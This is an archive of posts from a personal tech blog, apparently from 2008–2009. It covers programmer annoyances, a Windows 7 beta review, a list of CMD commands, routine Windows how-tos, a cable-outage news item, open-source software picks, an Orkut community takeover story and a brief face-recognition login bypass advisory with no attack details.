
Scope creep (also called focus creep, requirement creep, feature creep, and sometimes kitchen sink syndrome) in project management refers to uncontrolled changes in a project's scope. This phenomenon can occur when the scope of a project is not properly defined, documented, or controlled. It is generally considered a negative occurrence that is to be avoided.

Scope creep turns relatively simple requests into horribly complex and time consuming monsters. It only takes a few innocent keystrokes by the requirements guy for scope creep to happen:

Version 1: Show a map of the location
Version 2: Show a 3D map of the location
Version 3: Show a 3D map of the location that the user can fly through

Argh! What used to be a 30 minute task just turned into a massively complex system that could take hundreds of man hours. Even worse, most of the time scope creep happens during development, which requires rewriting, refactoring, and sometimes throwing out code that was developed just days prior.

7. Management that doesn't understand programming

Ok, so maybe there are some perks.

Management is not an easy job. People suck; we're fickle and fragile and we're all out for #1. Keeping a large group of people content and cohesive is a mountain of a task. However, that doesn't mean that managers should be able to get away without having some basic understanding of what their subordinates are doing, especially in the tech industry. When management cannot grasp the basic concepts of our jobs, we end up with scope creep, unrealistic deadlines, and general frustration on both sides of the table. This is a pretty common complaint amongst programmers and the source of a lot of angst (as well as one hilarious cartoon).

6. Documenting our applications

Let me preface this by saying that yes, I know that there are a lot of documentation-generating applications out there, but in my experience those are usually only good for generating API documentation for other programmers to read. If you are working with an application that normal everyday people are using, you're going to have to write some documentation that the average layman can understand (e.g. how your application works, troubleshooting guides, etc.).

It's not hard to see that this is something programmers dread doing. Take a quick look at all the open-source projects out there. What's the one thing that all of them are constantly asking for help with? Documentation.

I think I can safely speak on behalf of all programmers everywhere when I say, "can't someone else do it?".

5. Applications without documentation

I never said that we weren't hypocrites. :-) Programmers are constantly asked to incorporate 3rd party libraries and applications into their work. In order to do that, we need documentation. Unfortunately, as mentioned in item 6, programmers hate writing documentation. No, the irony is not lost on us.

There's nothing more frustrating than trying to utilize a 3rd party library while having absolutely no fricken idea what half the functions in the API do. What's the difference between poorlyNamedFunctionA() and poorlyButSimilarlyNamedFunctionB()? Do I need to perform a null check before accessing PropertyX? I guess I'll just have to find out through trial and error! Ugh.

4. Hardware

Any programmer who has ever been called upon to debug a strange crash on the database server or why the RAID drives aren't working properly knows that hardware problems are a pain. There seems to be a common misconception that since programmers work with computers, we must know how to fix them. Granted, this may be true for some programmers, but I reckon the vast majority of us don't know or really care about what's going on after the code gets translated into assembly. We just want the stuff to work like it's supposed to so we can focus on higher level tasks.

3. Vagueness

"The website is broken". "Feature X isn't working properly". Vague requests are a pain to deal with. It's always surprising to me how exasperated non-programmers tend to get when they are asked to reproduce a problem for a programmer. They don't seem to understand that "it's broken, fix it!" is not enough information for us to work off of.

Software is (for the most part) deterministic. We like it that way. Humor us by letting us figure out which step of the process is broken instead of asking us to simply "fix it".

2. Other programmers

Programmers don't always get along with other programmers. Shocking, but true. This could easily be its own top 10 list, so I'm just going to list some of the common traits programmers have that annoy their fellow programmers and save going into detail for a separate post:

Being grumpy to the point of being hostile.
Failing to understand that there is a time to debate system architecture and a time to get things done.
Inability to communicate effectively and confusing terminology.
Failure to pull ones own weight.
Being apathetic towards the code base and project

And last, but not least, the number 1 thing that annoys programmers...

1. Their own code, 6 months later

Don't sneeze, I think I see a bug.

Ever look back at some of your old code and grimace in pain? How stupid you were! How could you, who know so much now, have written that? Burn it! Burn it with fire!

Well, good news. You're not alone.

The truth is, the programming world is one that is constantly changing. What we regard as a best practice today can be obsolete tomorrow. It's simply not possible to write perfect code because the standards upon which our code is judged is evolving every day. It's tough to cope with the fact that your work, as beautiful as it may be now, is probably going to be ridiculed later. It's frustrating because no matter how much research we do into the latest and greatest tools, designs, frameworks, and best practices, there's always the sense that what we're truly after is slightly out of reach. For me, this is the most annoying thing about being a programmer. The fragility of what we do is necessary to facilitate improvement, but I can't help feeling like I'm one of those sand-painting monks.

Well, there you have it. The top 10 things that annoy programmers. Again, if you feel that I missed anything please be sure to let me know in the comments!

New FACE of WAR

2009-03-08T13:39:00.005+05:30

click on image to enlarge..

WINDOWS 7:worth installing?? (ch-2)

2009-03-04T14:06:00.006+05:30
continued from chapter one.

Another addition to the Windows 7 taskbar is the jumplist. A jumplist is a personalized menu that may offer access to the program’s functions or recently/frequently used files. Since i'm talking about personalized menus, their content is, of course, decided by each application’s developer and will consequently vary. For example, while the Windows Explorer jumplist displays a list of frequently and recently accessed locations, the Internet Explorer jumplist will display your browser's history.

As for new stylish elements in this operating system, I should mention that most progress bars will now be viewable from the taskbar, so you won’t need to focus on a window just to find out how much progress has been made. You will notice another eye-catching feature when hovering over the taskbar icon of an opened application – the lightning effect that highlights the pointer's position.

Naturally, the taskbar and Start Menu properties haven't been left unchanged either. Improvements have been made especially to the Start Menu options, which now allow you to customize it in a manner that, had it been available in previous Windows operating systems, it could have been achieved only through registry tweaks.

What's in and what's out

Fans of Windows Movie Maker will probably be surprised to find out that this component, along with Windows Mail and Windows Photo Gallery, is no longer bundled in Windows 7. Don't worry, you can always download them from Windows Live.

Of course, Microsoft couldn't have removed applications without adding a few new ones as well. A pretty useful software is Windows DVD Maker that allows you to create your very own multimedia DVD. Although the program is easy to use and offers a straightforward procedure for burning your video, music and graphic files to a DVD, it also enables you to customize various DVD settings, such as its menu, video format or DVD aspect ratio.

There are also a few other, smaller, additions like the Sticky Notes, Snipping Tool, and even a long awaited Disc Image Burning Tool. Unfortunately, none of these utilities is advanced, but if you're looking for some basic operations, they are surely the handiest solution.

Changes in Windows programs

The basic changes that you can easily discover by just browsing for a few minutes are as follows. Wordpad and Paint have been enhanced a bit, in that they now employ the ribbon interface. You'll be using the beta version of Internet Explorer 8 and a not-yet-released for download version 12 of Windows Media Player. Windows Calculator now features Programmer and Statistics modes, and includes date calculation and unit conversion functionality as well.

Windows Search functions on a much more improved engine, as compared to the one available at this moment in/for Vista. A less important optimization, but still worth mentioning, is the ability to resize the length of the search bar in Windows Explorer.
Last but not least in our list of changes that would probably interest any average user are the Control Panel additions. You'll notice a few new items: ClearType Text Tuner, Credential Manager, Display Color Calibration Wizard, Gadgets, Location and Other Sensors, Recovery, System Icons, Troubleshooting, Workspaces Center, Biometric Devices, Windows Solution Center.

Windows Solution Center is the replacement of the Windows Security Center currently available in Windows Vista and XP. It will now provide access to the system's security components (virus, network access and spyware protection, firewall, UAC, automatic updates, etc.), but also to maintenance tasks such as Windows Backup, System Restore or Troubleshooting.

Conclusion

After my quick tour in Windows 7, I find myself very enthusiastic about it. Unfortunately, there is always a “but” that follows this type of statements. Windows 7 improves or introduces cool, new features like jumplists and thumbnails, but you won't be able to fully enjoy them on non-native Windows 7 applications. Don't expect the tab trick to work on the current version of Firefox or Maxthon and, sadly, the same goes for the play control of Winamp, for example. Not yet, at least.

Homegroups are a great way to share files, but please remember they are a Windows 7 feature, so you won't be able to use them with your friends and colleagues using Vista or XP.

Last but not least in our list of changes that would probably interest any average user are the Control Panel additions. You'll notice a few new items: ClearType Text Tuner, Credential Manager, Display Color Calibration Wizard, Gadgets, Location and Other Sensors, Recovery, System Icons, Troubleshooting, Workspaces Center, Biometric Devices, Windows Solution Center.

Windows Solution Center is the replacement of the Windows Security Center currently available in Windows Vista and XP. It will now provide access to the system's security components (virus, network access and spyware protection, firewall, UAC, automatic updates, etc.), but also to maintenance tasks such as Windows Backup, System Restore or Troubleshooting.

WINDOWS 7:worth installing?? (ch-1)
WINDOWS 7:worth installing?? (ch-2)

WINDOWS 7:worth installing?? (ch-1)

2009-03-04T13:51:00.007+05:30
As you probably know by now, a beta version of Microsoft's future operating system, Windows 7, has been leaked to the “masses.” Of course, i couldn't let such an opportunity pass by, and decided to take a quick tour of this release, so i could come up with an answer to the most relevant question of all: is it worth it? Is Windows 7 worth installing? Therefore, i decided to have a look at the most common Windows locations, functions and utilities that the average user might access or use, see to what extent this operating system was any different from its predecessor and, thus, answer the above question.

Installation

As a starting note, i should state that Windows 7 was installed on a Vista-compatible laptop, and, therefore, performance was not an issue. As for the installation process, it lasted approximately 25 minutes and was almost identical to the one found in Windows Vista. You must have noticed that I said “almost.” The addition of homegroups is a difference between the two operating systems that you will surely notice even during the installation process – at the end of it, you will receive a password that will later allow you to access this facility.

Getting started

When the setup process was finished, I headed to the Getting started window to see the new functionalities in Windows that I should be concentrating on. Since i'm talking about a beta version, this didn't turn out to be a very wise decision: the What's New headlines were missing. Instead, Item 1, Item 2 and Item 3 were displayed. Still, included in this window is a See more new features button that leads to the section in Windows Help with all the new features I was looking for: Specialized for laptops, Optimized for entertainment, Designed for services, etc.

Highlights

Specialized for laptops, unfortunately, does not mean in any way that, by installing Windows 7 on a laptop, you'll be able to use it a lot longer by running just on your battery. The power consumption is, at best, the same as in Windows Vista. However, Windows 7 does include more advanced power options and power plans that might help you squeeze just a little bit more juice out of your battery.
In this version of Microsoft Windows, Media Player finally has its own sets of codecs, which will allow you to view videos, movies and clips without having to search the Internet for codec packs. Furthermore, Windows Media Center has been “pimped” to ensure that Windows 7 really is optimized for entertainment. The downside in this case is that, during my testing of Windows Media Player, the application froze repeatedly and, to cap it all off, so did the entire system with it (thus forcing the user to reboot in order to get back control).

I think it's safe to say that designing Windows 7 for services most probably brought the coolest new concepts in looks and maneuverability of windows. Therefore, in order to make this operating system from a touch screen extremely easy to use, several new, interesting and very useful features have been implemented. Aside from the Superbar you've probably heard of – that, in a way, uses the concept of mac docks – another addition, which, although potentially useful to the average user, I doubt was designed especially for them, is the “shake” functionality that allows them to minimize all windows behind a window that is shaken a bit using its title bar.

Last but not least, you'll be able to maximize a window by just dragging it to the top of the screen, or to resize its width to the width of the screen by either dragging its title bar to the right/left edge of the screen, or the resize arrows to the top/bottom of the screen. As a side note, similar actions have been assigned through the usage of the Windows and directional keys: Windows Key + Up = Maximize, Windows Key + Down = Minimize, Windows Key + Left = The window will occupy the entire left side of the screen, Windows Key + Right = The window will occupy the entire right side of the screen.
Start Menu and Taskbar
Since i'm talking about useful changes brought to the operating system's look, I must also mention the improved tray. First of all, to the right of the clock, you can now observe a new button that will show/hide the desktop (so, no, you won't be needing the quicklaunch shortcut anymore). Secondly, the possibility to change icon order has finally been implemented. And thirdly, all third-party/ irrelevant/ unused icons will no longer occupy most of the space in your tray: all of them can be accessed with just one click on a small arrow to the left of the tray area.

As you might have heard already, the Superbar isn't the only major change brought to the Windows 7 taskbar. You can now finally change the order of your windows in the taskbar. Furthermore, the thumbnails have been considerably tweaked, and they no longer function as a small, singular preview of an application.

Windows 7 will now display a thumbnail for each window of a group, and from each thumbnail, users can close the corresponding window or, in some cases, access its common controls, like Play, Previous, or Next in the case of Windows Media Player. Another example of how the thumbnails have been improved is the possibility to view the tabs of an application as if they were separate windows just by hovering over its taskbar icon with your mouse. Naturally, the thumbnail will also function as a preview to a specific window, so you won't necessarily need to switch windows in order to just take a quick peek at another program – for instance, hovering over the thumbnail will do the trick instead.

contd...
WINDOWS 7:worth installing?? (ch-1)
WINDOWS 7:worth installing?? (ch-2)

List of CMD commands

2009-01-02T23:21:00.003+05:30
Well in this post i am listing almost all possible commands that you will ever need operating a Windows commandprompt.Well you may find yourself familiar with a few of them...and for the one which you dont know much about you can always get more info for a command by typing comman/? in the prompt.

ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
~ ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes
b
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
c
CACLS Change file permissions
~ CALL Call one batch program from another
~ CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
~ CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
~ COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
~ COPY Copy one or more files to another location
CSCcmd Client-side caching (Offline Files)
CSVDE Import or Export Active Directory data
d
~ DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
~ DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
~ DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DISKPART Disk Administration
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory
e
~ ECHO Display message on screen
~ ENDLOCAL End localisation of environment changes in a batch file
~ ERASE Delete one or more files
~ EXIT Quit the current script/routine and set an errorlevel.
EXPAND Uncompress files
EXTRACT Uncompress CAB files
f
FC Compare two files
FIND Search for a text string in a file
FINDSTR Search for strings in files
~ FOR /F Loop command: against a set of files
~ FOR /F Loop command: against the results of another command
~ FOR Loop command: all options Files, Directory, List
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
~ FTYPE Display or modify file types used in file extension associations
g
GLOBAL Display membership of global groups
~ GOTO Direct a batch program to jump to a labelled line
h
HELP Online Help
i
~ IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP
k
KILL Remove a program from memory
l
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file
m
MAPISEND Send email from the command line
MBSAcli Baseline Security Analyzer.
MEM Display memory usage
~ MD Create new folders
MKLINK Create a symbolic link (linkd)
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
~ MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files
n
NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
p
~ PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
~ PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
~ POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
~ PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
~ PUSHD Save and then change the current directory
q
QGREP Search file(s) for lines that match a given pattern.
r
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Registry: Read, Set, Export, Delete keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
~ REM Record comments (remarks) in a batch file
~ REN Rename a file or files.
REPLACE Replace or update one file with another
~ RD Delete folder(s)
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
s
SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
~ SET Display, set, or remove environment variables
~ SETLOCAL Control the visibility of environment variables
SETX Set environment variables permanently
SHARE List or edit a file share or print share
~ SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
~ START Start a program or command in a separate window.
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration
t
TASKLIST List running applications and services
TASKKILL Remove a running process from memory
~ TIME Display or set the system time
TIMEOUT Delay processing of a batch file
~ TITLE Set the window title for a CMD.EXE session
TLIST Task list with full path
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
~ TYPE Display the contents of a text file
u
USRSTAT List domain usernames and last login
v
~ VER Display version information
~ VERIFY Verify that files have been saved
~ VOL Display a disk label
w
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands
x
XCACLS Change file permissions
XCOPY Copy files and folders
~ :: Comment / Remark

Commands marked ~ are Internal commands only available within the CMD shell.
All other commands (NOT marked with ~) are external commands which may be used under the CMD shell, PowerShell, or directly from START-RUN
"list of command prompt commands" "cmd commands" list of cmd commands"

Programming Quotes

2009-01-02T22:40:00.002+05:30
I was just wondereing on net randomly (as usual) when i came across a set of programming quotes.
well i found them very interesting so i have listed a few!!Hope you all like them!!
“Debugging is twice as hard as writing the code in the first place. Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it.”
- Brian Kernighan

“There are only two kinds of languages: the ones people complain about and the ones nobody uses.”

- Bjarne Stroustrup

“Any fool can write code that a computer can understand. Good programmers write code that humans can understand.”

- Martin Fowler

“There are two ways of constructing a software design: One way is to make it so simple that there are obviously no deficiencies, and the other way is to make it so complicated that there are no obvious deficiencies. The first method is far more difficult.”

- C.A.R. Hoare

“Most software today is very much like an Egyptian pyramid with millions of bricks piled on top of each other, with no structural integrity, but just done by brute force and thousands of slaves.”

- Alan Kay

“Measuring programming progress by lines of code is like measuring aircraft building progress by weight.”

- Bill Gates
“Programs must be written for people to read, and only incidentally for machines to execute.”

- Abelson / Sussman

“If you want to set off and go develop some grand new thing, you don’t need millions of dollars of capitalization. You need enough pizza and Diet Coke to stick in your refrigerator, a cheap PC to work on and the dedication to go through with it.”

- John Carmack

Windows 7 screenshots

2009-01-01T14:04:00.008+05:30
Windows is preparing to launch its latest OS windows 7.Though its beta version is still not publically availabele still its creating a sensations in the windows market about its features!! Its expected beta release is in first qauter of 2009.Well i Hope that it would be worth the wait.Not like the Vist which was much hyped but had nothing in store instead only created problems for its XP users in uninstalling it.Well anyways here are a few screenshots from Windows 7 which will definetly amaze you!!

How to remove a second windows OS

2008-12-25T19:49:00.002+05:30
This guide willl help you to remove 2nd installation of windows from your hard drive.
Just follow this step by step guide to get your 2nd windows installation removed withing minutes even from the bootup menu.

If you have got vista and XP and want to remove XP than the following method may not work.In such a case you may like to read how to remove vista
Note Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.

1. Start the Windows operating system that you want to keep.
2. To determine the Windows folder that you want to keep, click Start, click Run, type %windir%, and then click OK. Remember the folder that is opened. For example, the folder may be C:\Windows.

Note This is your "working" Windows folder. Do not delete or remove this folder from the partition.
3. In Windows Explorer, find the Windows folder that you want to remove.

Important Make sure that this folder is not the folder that you identified as your "working" Windows folder in step 2.
4. Right-click the Windows folder that you want to remove, and then click Delete.
5. Click Yes to confirm the deletion of the folder.
6. Click Start, right-click My Computer, and then click Properties.
7. On the Advanced tab, under Startup and Recovery, click Settings. The Startup and Recovery dialog box appears.
8. Under System startup, click Edit to modify the Boot.ini file.
9. On the File menu in Notepad, click Save As, and then save a backup copy of the Boot.ini file that is named Boot.old. (This is done to backup your old boot file)
10. On the File menu, click Exit to close the backup copy of the Boot.ini file.
11. In the Startup and Recovery dialog box, under System startup, click Edit to reopen the Boot.ini file.
12. In the [boot loader] section of the Boot.ini file, identify and then delete the line of text for the Windows operating system that you want to remove.
13.save and quit.

"How to remove windows" "uninstalling windows" "how to uninstall windows"

And here is the rest of it.

Hiding disk partition in windows XP

2008-12-23T19:21:00.004+05:30
Follow thses steps to hide your disk partition in windows XP
Go to Start > run > type "diskpart".(Without Quote)a dos window will appear with following prompt.DISKPART>2. Then type "list volume" this will look like it
Volume### Ltr Label Fs Type Size Status Info-------------- ---- ------ --- ----- ---- ------- --
Volume 0 F DC-ROM
Volume 1 C NTFS Partition 7000MB Healthy
Volume 2 D soft NTFS Partition 8000MB Healthy
Volume 3 E ---- NTFS Partition 8000MB Healthy.

If u wanna hide drive E then type "select volume 3"then a message will appear in same winwods { Volume 3 is the selected volume}
Now type " remove letter E" now a message will come { Diskpart Removed the Drive letter }sometime it requires the reboot the computer .
Diskpart will remove the letter .Windows XP is not having capabilty to identify the unkown volume.Don afraid ur Data will ramin same .
To Come backe the Drive repeat the process . but in 4th step whish is shown in this post replace " remove" to "assign"i mean type " assign letter E"

Note:-if you are not a lammer than there are still other ways to get around this...
hint:-use control pannel>disk managment

And here is the rest of it.

How to delete a protected file

2008-12-23T19:10:00.002+05:30
Many a time you want to delete some files which pops up error message such as "file cannot be deleted" or "you donnot have the appropiriate permission to delete this file". These messages are really irritating and frustrating know i will let you know how to delete such files...

1. Open a Command Prompt window and leave it open.
2. Close all open programs.
3. Click Start, Run and enter TASKMGR.EXE.
4. Go to the Processes tab and End Process on Explorer.exe.
5. Leave Task Manager open..(After this There will be no desktop icons and nothing is accessible but don’t worry this is due to shutting down of explorer)
6. Go back to the Command Prompt window and change to the directory to where undeletablefile) is located in.
7. At the command prompt type DEL where is the file you wish to delete.
8. Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
9. Close Task Manager.

note:-use at your own risk

Cable damage hits India, Qatar and UAE hardest

2008-12-20T22:54:00.007+05:30

Damage to three major undersea cables seriously disrupted more than half of internet and phone services between Europe, the Middle East and Asia on Friday, with India, Qatar and the United Arab Emirates the worst affected, France Telecom said.

The telecom operator said initial estimates show 82 percent of service to India was disrupted, while 73 percent of service to Qatar and 68 percent to the UAE was affected.

Around 50 percent of service to Saudi Arabia, Jordan and Egypt was also disrupted, it said.

"The causes of the cut, which is located in the Mediterranean between Sicily and Tunisia, on sections linking Sicily to Egypt, remain unclear," France Telecom said in a statement on its website.

The company said a ship set off in the early hours of Saturday morning to fix the lines, but that it would not arrive until Monday and that it could take until Dec. 31 until normal service was restored.

UAE telecom Etisalat said it had taken "precautionary measures to ensure the flow of internet services", state news agency WAM reported, citing a company statement.

"Etisalat was able to use alternative routes shortly after the disruption of the three international cables, thereby ensuring the continuity and smooth flow of internet services in the UAE," the statement said.

Du, the UAE's second telecom, said it had re-routed data and international voice traffic east through alternative cable systems.

"The top 50 voice destinations are now unaffected and only 15 percent degradation overall remains. Internet capacity is reduced but again additional capacity is being activated to the east which will restore performance to more normal levels," the company said in a statement.

Qatari telecom Qtel said loss of capacity in Qatar was being kept below 47 percent and the country "is only experiencing limited effects".

"Qtel’s network of alternative transmission routes and back-up cables has ensured that Qatar has remained connected," the company said in a statement.

However, it did warn users might experience some slowdown in internet speed and access problems until the cables were repaired.

Kuwait's Ministry of Communications said the damage had affected internet service and some international communications in the Gulf state, state news agency KUNA reported.

The ministry said it had "contacted local, regional and international parties to secure communications' alternatives to provide the service".

France Telecom spokesman Louis-Michel Aymard was quoted by newswire AFP as saying the cuts were unlikely to be an attack. He said the cables could have got caught up in trawlers' nets or there could have been an underwater landslide.

Aymard said one of the cables seems to have been severed, while the other two seem to have been only partially cut.

The cables are jointly owned by several dozen different countries. One of the cables is 40,000 km long and links 33 different countries while a second is 20,000 km long and serves 14 states.

In January, five cables in the Middle East and Europe were cut, causing severe internet disruption across the Middle East and Asia.

Cable damage hits India, Qatar and UAE hardest
UPDATE 1: Three undersea cables linking more than 47 countries damaged in Mediterranean.

Opensource softs for Windows

2008-12-14T11:45:00.008+05:30
Well tried of looking for softwares for free?? bored of the links which take you to credit card pages?? Here i am listing the most widely used windows softwares which are open source and absolutely free.with this post i am starting a new section "downloads" which will list all soft links that you ever will require..So do come back for more..enjoy.

Free windows softwares downloads:-
Web Browsing

Mozilla Firefox
The premier free, open-source browser. Tabs, pop-up blocking, themes, and extensions. Considered by many to be the world's best browser.
Download Page

Video Player / Video Podcasting

Miro
Beautiful interface. Plays any video type (much more than windows media player). Subscribe to video RSS, download, and watch all in one. Torrent support. Search and download from YouTube and others.
Download Page

IM - Instant Messaging

Pidgin
Connect to multiple IM accounts simultaneously in a single app, including: AOL IM, MSN, and Jabber.
Download Page

E-mail

Mozilla Thunderbird
Powerful spam filtering, solid interface, and all the features you need.
Download Page

RSS

RSSOwl
Solid cross-platform RSS client.
Download Page

Peer-to-Peer Filesharing

Cabos
A simple, easy to use filesharing program. Gnutella network.
Download Page

Gnucleus
A very good Gnutella search and download filesharing program.
Download Page

Azureus
A powerful, but complicated BitTorrent client. So many features you'll lose your mind.
Download Page

Video Playback

VLC
Plays more video files than most players: Quicktime, AVI, DIVX, OGG, and more. Pretty good interface.
Download Page

MPlayer
Similar to VLC-- plays loads of video formats.
Download Page

Media Player Classic
Compact, but powerful media player. Plays anything under the sun. No install necessary.
Download Page

DVD Ripping / Video Conversion

Media Coder
Great tool for ripping CDs, DVDs, etc and converting between tons of video formats.
Download Page

Word Processing / Office Suites

OpenOffice.org
Big, full featured suite of tools for word processing and spreadsheets. Compatible with and a free replacement for Microsoft Word documents. Also supports OpenDocument Format.
Download Page

AbiWord
A word processor. Leaner and quicker than OpenOffice. Compatible with Microsoft Word documents and OpenDocument Format.
Download Page

Podcasting

Juice
Solid podcasting client.
Download Page

DVD Ripping

Handbrake
DVD to MPEG-4 ripper/converter.
Download Page

Sound Recording

Audacity
Simple sound recording tool.
Download Page

Graphics / Photo Editing

GIMP
Photo editing application that rivals Photoshop in features.
Download Page

Paint.NET
Graphics editor with a very nice interface.
Download Page

Inkscape
Vector graphics application.
Download Page

FTP / SFTP

Filezilla
Excellent FTP program.
Download Page

IRC

X-Chat 2
IRC client.
Download Page

Archiving

PeaZip
Fantastic archiving utility to extract and pack archives of an extensive amount of formats. PeaZip also features password protecting archives, keyfile support, system integration, a lovely interface, and much more.
Download Page

OUG[orkut underground]-13 hacked?

2008-12-13T00:15:00.009+05:30
I was paying one of my regular visits on 9/12/2008 evening to the wellknown OUG-13-"orkut underground community" when i saw something that was very different sight.Instead of the usual- "Gravity is not responsible for people falling at our feet, our actions made them do so" it was written "hacked by dx".All posts and forum were completely gone...The owner name was changed!!

Fortunately soon after everything was back to control and we had the following explanation from one of the OUG moderators:-
Explaining Incident 9/12/2008 - Tuesday

So it was Around 10:30p.m. I was Out of house, that's when i got Call from OuG member Zubin. He told me the incident I told him to put pushpak in conference. Supriya Joined in and Prateek joined in Conference. Told Supriya OuG Is taken over by n00bs. Realised his Profile was Deleted and so some guy got gain ownership option and so they took the ownership. Supriya kept the phone he came online logged in to his co-owner profile and gained back the Ownership of OuG, and transferred to Nikhilesh, and then it underwent a number of ownership and finally it is in the hands of our secret agent :-$ Rakhi sawant..she rockz

Explaining Further..
There is a kind of Idiotic Link in Google Which has a form which when filled deleted or disables the profiles of Orkut User's(Don't ask where is that link and which is that link - not allowed in this topic) which some n00bs used to delete the profiles and take-over the OuG community. (Still Asumed Not Confirmed). So when the profile was deleted many members got the option og gain ownership...owners were getting changed every second...and finally one idiotic DX or XD watever member got the community and then wat he deleted all the topics and claimed OuG got hacked...lol @ those n00bs
And then as i said before called suppi in conf and told him about this, etc. he went offline later coz of his exmaz. It would have not been possible to do all this without the proper communication between members, mods and owner. And then till 12:00, almost all important topics topics were restored and the community was much more stable, mods were appointed..while owner profile har baar change hoti rahegi for security reasons..This was all coz of stupidity of Google..kisi ki koi mistake nahin hai..no one can hack us simply..its just tht orkut is gay...he is giving more important to his partner than orkut so he doesn't have time to fix this stupid bugs. AS for Now We are not accepting any new members. They will hack us again as they say coz they are gay...a BIG LOL @ THEM. Enjoy..

VULNERABILITY IN FACE RECOGNITION AUTHENTICATION MECHANISM

2008-12-11T19:34:00.004+05:30
VULNERABILITY IN FACE RECOGNITION AUTHENTICATION MECHANISM
LENOVO-ASUS-TOSHIBA LAPTOPS
1. General Information
Face Recognition feature is provided by Asus, Lenovo and Toshiba as specialized software that is issued together with their laptops. This feature is embedded into all laptop families having webcams and supporting Windows Vista, XP operating system. Owners of laptops benefiting from this technology do not have to type in their passwords or use their fingerprint but to sit in front of their laptops to login.
Face-recognition is introduced by these vendors as a remarkable feature which helps prevent unauthorized people breaking into laptops and ensure information security for their owners.

Details : http://security.bkis.vn/?p=292
SVRT Advisory : SVRT-07-08
Initial vendor notification : 20-11-2008
Release Date : 08-12-2008
Update Date : 08-12-2008
Discovered by : SVRT-Bkis
Attack Type : Authentication Mechanism Bypass
Security Rating : Critical
Impact : Loss of Confidentiality and Integrity
Affected Software : Lenovo Veriface III (prior version is vulnerable)
Asus SmartLogon V1.0.0006 (prior version is vulnerable)
Toshiba Face Recognition 2.0.2.32 (prior version is vulnerable)
Video demo: http://security.bkis.vn/Proof-of-concept/Face_Recognition/FaceRecognitionBypassing_DemoVideo.wmv
2. Technical Description

After 4 months researching on Face Recognition technology apply on laptop, Bkis, Vietnam, has come to a conclusion that the User Authentication Mechanisms Based on Face Recognition of Asus, Lenovo and Toshiba haven't met security needs.

Bkis research show that the Authentication Mechanism Based on Face-Recognition of these 3 laptop vendors can all be bypassed, even when set at highest security level.

